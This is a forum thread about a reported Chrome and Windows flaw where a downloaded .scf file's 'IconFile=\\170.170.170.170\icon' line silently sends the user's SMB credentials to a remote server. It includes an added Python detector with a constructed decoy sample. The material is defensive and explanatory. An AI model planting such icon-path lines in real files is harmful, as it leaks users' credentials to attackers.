
Running Chrome on Windows?


    Watch out for .scf files.

    DefenseCode - Home

    By default Chrome treats files ending with the .scf extension – Windows Explorer Shell Command File – as being safe regardless of source and will download and save it without the user being prompted for a save location. If the .scf file contains a string in the format “IconFile=\\170.170.170.170\icon” then as soon as the folder containing the downloaded file is opened the system will attempt to retrieve the file “icon” from the IP address given. This address will be hosting an SMB server that will request the user's ID and password transparently via the SMB protocol. This data can then be captured by the attacker and replayed against other services, such as Office 365, or stored for a brute-force attack offline.

    There is no need for interaction from the user; the act of opening the folder containing the malicious file is sufficient to trigger the attack.

    There is no current fix available for Windows as this functionality is part of the OS design. The only current mitigation is to change the default setting in Chrome to prompt the user to select a save location, which makes the .scf extension visible.

    Under normal circumstances the .scf extension is not displayed by Windows Explorer, so “picture.jpg.scf” appears in Windows Explorer as “picture.jpg”.
    "Being nice costs nothing and sometimes gets you extra bacon" - Pondlife.
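    As an added example (not from the original post or from DefenseCode), a Python check a defender could run over a downloads folder: it parses the INI-style .scf format, flags an IconFile that is a UNC path (the field Explorer resolves as soon as the folder is rendered), notes whether that host is outside private address space, and catches the double-extension trick. The two sample files are constructed here for illustration.

```python
import ipaddress
import re

# Constructed sample .scf contents (not real captured files): the first mimics the
# decoy described in the post, the second a benign "Show Desktop" shell command file.
SAMPLES = {
    "picture.jpg.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\170.170.170.170\\icon\r\n"
                       "[Taskbar]\r\nCommand=ToggleDesktop\r\n",
    "Show Desktop.scf": "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
                        "[Taskbar]\r\nCommand=ToggleDesktop\r\n",
}

UNC_RE = re.compile(r"^\\\\([^\\]+)\\")                             # \\host\share\...
DOUBLE_EXT_RE = re.compile(r"\.[a-z0-9]{2,4}\.scf$", re.IGNORECASE)  # picture.jpg.scf

def parse_scf(text):
    """Parse the INI-style file into {section: {key: value}} with lower-cased names."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def host_is_public(host):
    """True for an IP outside private/loopback/link-local space, or a dotted DNS name."""
    try:
        ip = ipaddress.ip_address(host)
        return not (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved)
    except ValueError:
        return "." in host  # single-label names resolve on the LAN via NetBIOS/LLMNR

def assess_scf(filename, text):
    """Return the reasons a file looks like a credential-leaking decoy ([] if clean)."""
    reasons = []
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_RE.match(icon)
    if match:  # Explorer will open an SMB session to this host just to fetch the icon
        host = match.group(1)
        reasons.append(f"IconFile points at an SMB share on {host}")
        if host_is_public(host):
            reasons.append("IconFile host is outside private address space")
    if DOUBLE_EXT_RE.search(filename):
        reasons.append("double extension hides .scf behind a benign-looking name")
    return reasons
```

    Running `assess_scf(name, body)` over each entry in `SAMPLES` reports three findings for the decoy and none for the benign file.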

    #2
    Interesting post. I would hope Google would patch this quickly. SMB quite topical right now.

    Originally posted by DaveB View Post
    Watch out for .scf files.

    DefenseCode - Home

    By default Chrome treats files ending with the .scf extension – Windows Explorer Shell Command File – as being safe regardless of source and will download and save it without the user being prompted for a save location. If the .scf file contains a string in the format “IconFile=\\170.170.170.170\icon” then as soon as the folder containing the downloaded file is opened the system will attempt to retrieve the file “icon” from the IP address given. This address will be hosting an SMB server that will request the user's ID and password transparently via the SMB protocol. This data can then be captured by the attacker and replayed against other services, such as Office 365, or stored for a brute-force attack offline.

    There is no need for interaction from the user; the act of opening the folder containing the malicious file is sufficient to trigger the attack.

    There is no current fix available for Windows as this functionality is part of the OS design. The only current mitigation is to change the default setting in Chrome to prompt the user to select a save location, which makes the .scf extension visible.

    Under normal circumstances the .scf extension is not displayed by Windows Explorer, so “picture.jpg.scf” appears in Windows Explorer as “picture.jpg”.



      #3
      I'm surprised that a file-sharing \\x.x.x.x\ URL would jump through firewalls and actually get something from the internet. For that reason it's more of a Windows problem than a Chrome problem, as you could still get a .scf file from some other source.

      And only numpties hide file extensions.
      Will work inside IR35. Or for food.



        #4
        Originally posted by VectraMan View Post
        I'm surprised that a file-sharing \\x.x.x.x\ URL would jump through firewalls and actually get something from the internet. For that reason it's more of a Windows problem than a Chrome problem, as you could still get a .scf file from some other source.

        And only numpties hide file extensions.
        Unless the company or user has blocked outbound SMB traffic at the perimeter (firewall, home router etc.), then it will be allowed out. Outbound rules tend to be far more relaxed than inbound, and there are cases where you would legitimately want to allow SMB traffic for remote authentication etc.

        The issue with Chrome is that by default it treats .scf files as implicitly trusted, so it doesn't, by default, ask for a save location, and the user never sees the full file name, only the one presented by the dodgy website.

        Google fixed this for .lnk files related to the Stuxnet worm by forcing the user to confirm the location for the file to be saved but didn't apply the same restriction to .scf files.

        Internet Explorer doesn't share the same functionality. It always asks for a location to save a file regardless of type.

        AV programs will not identify them as a threat, as all they contain is plain text, and any attempt to interpret the content is liable to create large numbers of false positives.
        "Being nice costs nothing and sometimes gets you extra bacon" - Pondlife.
